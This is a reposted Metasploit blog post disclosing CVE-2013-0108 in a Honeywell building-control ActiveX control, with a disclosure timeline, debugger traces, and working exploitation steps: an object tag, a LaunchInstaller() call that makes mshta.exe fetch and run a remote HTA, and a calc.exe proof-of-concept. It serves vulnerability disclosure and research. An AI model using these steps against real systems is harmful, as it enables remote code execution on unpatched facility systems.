Exploit for new Vulnerability on Honeywell EBI ActiveX (CVE-2013-0108)

[thehat]

Exploit for new Vulnerability on Honeywell EBI ActiveX (CVE-2013-0108)

Posted by Juan Vazquez in Metasploit on Mar 11, 2013 11:16:34 AM

Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing buildings systems, providing seamless digital information and control across all building operational management systems." Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:

Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.

The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.

Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern was both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A++++, would exploit again. (:

Vulnerability Summary

The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.

Disclosure Timeline

Date Description

2013-01-08 Initial discovery by Juan Vazquez, Metasploit Researcher

2013-01-08 Metasploit module written

2013-01-10 Initial disclosure to the vendor, Honeywell

2013-01-10 Initial response from the vendor

2013-01-25 Disclosure to CERT/CC

2013-01-30 Disclosure coordination with vendor, CERT/CC, and ISC-CERT

2013-02-04 Vendor advisory bulletin and patch drafted

2013-02-22 Vendor advisory bulletin and patch release

2013-02-22 ISC-CERT Advisory published

2013-03-11 Public disclosure and Metasploit modules published

2013-03-12 Kill bits released on Microsoft Patch Tuesday (proposed)

2013-03-14 ISC-CERT Advisory updated

Technical Analysis

A remote page can make the Internet Explorer load the vulnerable ActiveX control by using its class ID:

<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">

The vulnerable ActiveX control will be loaded by Internet Explorer:

0:006> g

ModLoad: 020b0000 020e7000 C:\WINDOWS\system32\HSCRemoteDeploy.dll

eax=00000003 ebx=00000000 ecx=020de070 edx=f20b0000 esi=00255ba8 edi=00000000

eip=7c90e4f4 esp=00137dc0 ebp=00137eb4 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246

ntdll!KiFastSystemCallRet:

7c90e4f4 c3 ret

0:000> lmv m HSCRemoteDeploy

start end module name

020b0000 020e7000 HSCRemoteDeploy (deferred)

Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll

Image name: HSCRemoteDeploy.dll

Timestamp: Wed Sep 29 13:51:06 2010 (4CA3282A)

CheckSum: 0003DCC8

ImageSize: 00037000

File version: 5.7.165.119

Product version: 5.7.165.119

File flags: 0 (Mask 3F)

File OS: 4 Unknown Win32

File type: 2.0 Dll

File date: 00000000.00000000

Translations: 0409.04b0

CompanyName: Honeywell Limited

ProductName: HMIWeb

FileVersion: 5, 7, 165, 119

PrivateBuild: Official build

FileDescription: Unicode Release Build

LegalCopyright: Copyright 2008 Honeywell International Sàrl

LegalTrademarks: Copyright 2008 Honeywell International Sàrl

Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by specifying an arbitrary URI as "bstrParameter" parameter. The prototype for this method is described here:

Sub LaunchInstaller (

ByVal bstrServer As String ,

ByVal bstrRedirect As String ,

ByVal bUpgrade As Boolean

)

It can be abused in code such as:

RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false);

The above LaunchInstaller() call will translate to the next execution of ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure stored in 0013e200 as argument:

0:000> bp HSCRemoteDeploy+866A

0:000> g

Breakpoint 0 hit

eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c

eip=020b866a esp=0013e1ec ebp=0013e254 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246

HSCRemoteDeploy!DllUnregisterServer+0x2e4a:

020b866a ff10 call dword ptr [eax] ds:0023:020d2644=d68d0b02

0:000> t

eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c

eip=020b8dd6 esp=0013e1e8 ebp=0013e254 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246

HSCRemoteDeploy!DllUnregisterServer+0x35b6:

020b8dd6 ff253c120d02 jmp dword ptr [HSCRemoteDeploy!DllUnregisterServer+0x1ba1c

(020d123c)] ds:0023:020d123c={SHELL32!ShellExecuteExW (7ca02f03)}

0:000> dd esp L2

0013e1e8 020b866c 0013e200

The SHELLEXECUTEINFO used as parameter contains the next values:

Field Value

lpVerb open

lpFile C:\WINDOWS\system32\mshta.exe

lpParameters http://192.168.1.128:8080/System/Displays/RemoteInstallWelcome.hta

0:000> du poi(0013e200+C)

021040ac "open"

0:000> du poi(0013e200+10)

0210246c "C:\WINDOWS\system32\mshta.exe"

0:000> du poi(0013e200+14)02104014 "http : //192.168.1.128:8080/System"

02104054 "Displays/RemoteInstallWelcome.ht"

02104094 "a"

The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.

Exploitation

Since arbitrary HTA application execution is possible, according to the MSDN article Introduction to HTML Applications (HTAs), arbitrary code execution will be possible:

As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.

In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.

The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.

As a simple proof of concept, the next HTA application can be used to launch calc.exe:

    <script>  
    a=new ActiveXObject("WScript.Shell");  
    a.run('%windir%\\\\System32\\\\calc.exe');  
    window.close();  
    </script>  

In order to achieve remote code execution a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 operating systems with Internet Explorer 6 to Internet Explorer 9:

Sursa : https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi